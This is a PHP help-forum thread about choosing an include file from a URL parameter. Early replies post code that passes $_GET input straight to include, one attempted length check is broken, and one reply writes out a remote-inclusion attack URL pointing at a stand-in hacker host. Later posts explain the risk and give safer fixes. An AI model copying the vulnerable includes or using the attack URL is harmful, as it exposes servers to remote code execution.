denoteone Posted April 21, 2009

I want to include a .txt file based on a variable passed in the URL, and if that variable is not set in the URL then show the default include file. This is what I have so far, but I am pretty sure that I am not checking if it is set properly. The links could look like so:

http://www.mysite.com?page=project1 this would include the txt file named project1.txt
or
http://www.mysite.com //this would show the default

<?PHP
if($_GET['page'] isset){
    $page = $_GET['page'] . '.txt';
    include $page;
}else{
    include 'default.txt';
}
?>

The Little Guy Posted April 21, 2009

I would do it like so:

<?php
if(isset($_GET['page'])){
    $page = $_GET['page'] . '.txt';
}else{
    $page = 'default.txt';
}
$handle = fopen($page, 'r');
$contents = fread($handle, filesize($page));
echo $contents
?>

denoteone Posted April 21, 2009 (Author)

Thanks Little Guy. Is there a reason behind not using "include"? Hey love the avatar they make me smile too!

Seven_Rings Posted April 21, 2009

The only thing you are doing wrong is the isset. Syntax is isset($var). This should be a working version of your code:

<?php
if(isset($_GET['page'])) {
    $page = $_GET['page'].'.txt';
    include $page;
} else {
    include 'default.txt';
}
?>

Enjoy,
-Seven_Rings

PFMaBiSmAd Posted April 21, 2009

To avoid raw php code inclusion from a remote hacker's site, if you are going to include a file this way, either validate that $_GET['page'] only has very specific values in it that match your pages, or check if the file $_GET['page'].'.txt' exists on your web server, or make sure that allow_url_include is off (php5.2.0 and higher), or make sure that allow_url_fopen is off (before php5.2.0.)

Without these checks, someone can visit your page using http://www.mysite.com?page=http://hackers_site/project1 where he has a file project1.txt on his site that contains raw php code that will then get included and executed on your server.

Seven_Rings Posted April 21, 2009

Very good advice PFMaBiSmAd. I was trying to be very straightforward, but I probably should have mentioned this.

Thanks,
-Seven_Rings

The Little Guy Posted April 21, 2009

You probably would want to place all the txt files in a folder, then make it the "Root" include folder... so anything above that folder can not be accessed...

laffin Posted April 21, 2009

[quote]Thanks Little Guy. Is there a reason behind not using "include"? Hey love the avatar they make me smile too![/quote]

I think the reason behind this is because it's not .php. If it was .php, u can assume it's html/php code in the file, so include can process the code in the file. fread/echo doesn't process the code, it just spits it out to the browser as is. And if it's a php script and ya name it .txt, it's a bad idea, as then anyone can see the script and look for ways of breaking the script.

I think u can replace the fread/echo with readfile instead.

The Little Guy Posted April 21, 2009

[quote]
[quote]Thanks Little Guy. Is there a reason behind not using "include"? Hey love the avatar they make me smile too![/quote]

I think the reason behind this is because it's not .php. If it was .php, u can assume it's html/php code in the file, so include can process the code in the file. fread/echo doesn't process the code, it just spits it out to the browser as is. And if it's a php script and ya name it .txt, it's a bad idea, as then anyone can see the script and look for ways of breaking the script.

I think u can replace the fread/echo with readfile instead.
[/quote]

In my opinion allowing users to choose a file and execute it is a little more dangerous with include/require...

denoteone Posted April 23, 2009 (Author)

[quote]To avoid raw php code inclusion from a remote hacker's site, if you are going to include a file this way, either validate that $_GET['page'] only has very specific values in it[/quote]

So if all my text files that I am including will only have a file name of 4 characters, would the following code test work?

[code]
if(isset($_GET['page'])) {
    $pagecount = strlen($page);
    if($pagecount > 4){
        // this is not a valid file
    }else{
        $page = $_GET['page'].'.txt';
        include $page;
    }
}else {
    include 'default.txt';
}
[/code]

jonsjava Posted April 23, 2009

This is a safer way than your method. This way, they can only choose a page that you have allowed explicitly:

<?php
$allowed_pages = array("project1", "main", "project2", "project3");
if (isset($_GET['page']) && in_array($_GET['page'], $allowed_pages)){
    $page = $_GET['page'].".txt";
}
else{
    $page = "main.txt";
}
include($page);
?>

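The other suggestions made in this thread (PFMaBiSmAd's check that the file exists on the server, The Little Guy's dedicated folder, laffin's readfile) can be combined when a hard-coded list of pages is impractical. The following is an added example, not code posted by any participant; the pages/ folder and the names PAGE_DIR and resolve_page() are assumptions.

```php
<?php
// Added example, not code from the thread. PAGE_DIR and resolve_page() are
// hypothetical names; keeping the .txt files in a pages/ folder is an assumption.
define('PAGE_DIR', __DIR__ . '/pages');

/**
 * Map a ?page= value to a .txt file directly inside $baseDir.
 * Returns the resolved path, or null if the value is not acceptable.
 */
function resolve_page($name, $baseDir)
{
    // Accept only short names made of letters, digits, '_' and '-'.
    // This rejects arrays (?page[]=x), URLs (':' and '/') and "../" sequences.
    if (!is_string($name) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.txt'); // false if the file is missing
    if ($base === false || $path === false) {
        return null;
    }
    // Second check: after symlinks are resolved, the file must still sit
    // directly inside the base folder and be a regular file.
    if (dirname($path) !== $base || !is_file($path)) {
        return null;
    }
    return $path;
}

$requested = isset($_GET['page']) ? $_GET['page'] : 'default';
$file = resolve_page($requested, PAGE_DIR);
if ($file === null) {
    // Unknown or invalid name: fall back to the default page.
    $file = resolve_page('default', PAGE_DIR);
}
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
// readfile() sends the bytes as they are; unlike include, it never executes
// PHP code that happens to be in the file.
readfile($file);
```

With this layout, http://www.mysite.com?page=project1 outputs pages/project1.txt, while http://www.mysite.com?page=http://hackers_site/project1 fails the name check and gets pages/default.txt.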
denoteone Posted April 23, 2009 (Author)

Thanks! jonsjava and everyone else!